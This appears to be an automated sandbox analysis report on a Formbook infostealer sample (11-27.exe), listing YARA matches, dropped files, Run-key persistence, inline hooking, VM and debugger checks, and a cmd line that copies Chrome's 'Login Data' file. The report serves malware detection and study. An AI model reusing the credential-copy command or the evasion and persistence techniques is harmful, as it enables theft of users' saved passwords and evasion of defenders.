Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\tpmH.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\tpmH.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\tpmH.url, type: DROPPED	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/7@13/7

Source: C:\Users\user\Desktop\11-27.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\DB1

Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\7N4802EQ\7N4logri.ini

Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 11-27.exe	Virustotal: Detection: 28%
Source: 11-27.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\11-27.exe

File read: C:\Users\user\Desktop\11-27.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\11-27.exe 'C:\Users\user\Desktop\11-27.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

File written: C:\Users\user\AppData\Roaming\7N4802EQ\7N4logri.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 11-27.exe

Static file information: File size 1311424 > 1048576

Source:	Binary string: netstat.pdbGCTL source: 11-27.exe, 00000000.00000002.420907601.0000000003170000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000001.00000000.371534945.0000000007CA0000.00000002.00000001.sdmp
Source:	Binary string: msdt.pdbGCTL source: Hmptdrv.exe, 00000002.00000002.419969153.0000000005380000.00000040.00000001.sdmp
Source:	Binary string: netstat.pdb source: 11-27.exe, 00000000.00000002.420907601.0000000003170000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: 11-27.exe, 00000000.00000002.424540511.00000000055C0000.00000040.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.420844920.00000000056FF000.00000040.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.438727174.00000000056EF000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000002.434695012.000000000371F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 11-27.exe, 00000000.00000002.424540511.00000000055C0000.00000040.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.420844920.00000000056FF000.00000040.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.438727174.00000000056EF000.00000040.00000001.sdmp, msdt.exe, NETSTAT.EXE, svchost.exe, 0000000C.00000002.434695012.000000000371F000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: Hmptdrv.exe, 00000005.00000003.426893413.0000000000844000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: Hmptdrv.exe, 00000005.00000003.426893413.0000000000844000.00000004.00000001.sdmp
Source:	Binary string: msdt.pdb source: Hmptdrv.exe, 00000002.00000002.419969153.0000000005380000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000001.00000000.371534945.0000000007CA0000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239C23 push ebx; ret	0_3_02239C39
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C724 push esi; retf	0_3_0223C819
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C137 push esi; retf	0_3_0223C146
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D536 push esi; retf	0_3_0223D537
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B338 push esi; retf	0_3_0223B33C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223943F push edi; ret	0_3_0223944C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D207 push esi; retf	0_3_0223D211
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D607 push esi; retf	0_3_0223D615
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239E14 push ebx; ret	0_3_02239E16
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D61B push esi; retf	0_3_0223D621
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C81F push esi; retf	0_3_0223C822
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223926C push esi; retf	0_3_02239272
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239A6C push esi; retf	0_3_02239A70
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B178 push esi; retf	0_3_0223B1A8
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223997C push ebx; ret	0_3_02239987
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D24E push esi; retf	0_3_0223D24F
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223D153 push esi; retf	0_3_0223D201
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C1A9 push esi; retf	0_3_0223C1EB
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B0B3 push esi; retf	0_3_0223B16C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223A7B0 push esi; retf	0_3_0223A7D8
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B287 push esi; retf	0_3_0223B288
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223A392 push edi; iretd	0_3_0223A393
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223949D push ebx; ret	0_3_0223949F
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C49C push esi; retf	0_3_0223C4BC
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223B5E4 push esi; retf	0_3_0223B5E5
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02239EE9 push ebx; ret	0_3_02239EEB
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C4EF push esi; retf	0_3_0223C4F1
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C2FC push esi; retf	0_3_0223C393
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C3C2 push esi; retf	0_3_0223C3CF
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_0223C5D6 push esi; retf	0_3_0223C5FE
Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02B11AA4 push 00440316h; ret	0_3_02B11B02

Source: C:\Users\user\Desktop\11-27.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

Jump to dropped file

Source: C:\Users\user\Desktop\11-27.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hmpt			Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hmpt			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE4

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\11-27.exe	RDTSC instruction interceptor: First address: 00000000030D34FC second address: 00000000030D3502 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11-27.exe	RDTSC instruction interceptor: First address: 00000000030D3776 second address: 00000000030D377C instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	RDTSC instruction interceptor: First address: 00000000051F662C second address: 00000000051F6632 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	RDTSC instruction interceptor: First address: 00000000051F68A6 second address: 00000000051F68AC instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000002A998E4 second address: 0000000002A998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000002A99B5E second address: 0000000002A99B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 00000000004598E4 second address: 00000000004598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000459B5E second address: 0000000000459B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000030098E4 second address: 00000000030098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000003009B5E second address: 0000000003009B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_04916DE6 rdtsc

6_2_04916DE6

Source: C:\Windows\explorer.exe TID: 6864

Thread sleep time: -68000s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000001.00000000.374736274.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.374075978.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000001.00000000.365630880.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000001.00000000.374075978.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.365630880.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 11-27.exe, 00000000.00000002.414500511.0000000000883000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.403982705.0000000000728000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428910857.00000000007DA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.371869005.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000001.00000000.371869005.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000000.374736274.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000001.00000000.354990906.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000001.00000000.363772887.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\11-27.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_04916DE6 rdtsc

6_2_04916DE6

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_049195D0 NtClose,LdrInitializeThunk,

6_2_049195D0

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E849B mov eax, dword ptr fs:[00000030h]	6_2_048E849B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A8CD6 mov eax, dword ptr fs:[00000030h]	6_2_049A8CD6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049914FB mov eax, dword ptr fs:[00000030h]	6_2_049914FB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956CF0 mov eax, dword ptr fs:[00000030h]	6_2_04956CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956CF0 mov eax, dword ptr fs:[00000030h]	6_2_04956CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04956CF0 mov eax, dword ptr fs:[00000030h]	6_2_04956CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A740D mov eax, dword ptr fs:[00000030h]	6_2_049A740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A740D mov eax, dword ptr fs:[00000030h]	6_2_049A740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A740D mov eax, dword ptr fs:[00000030h]	6_2_049A740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991C06 mov eax, dword ptr fs:[00000030h]	6_2_04991C06
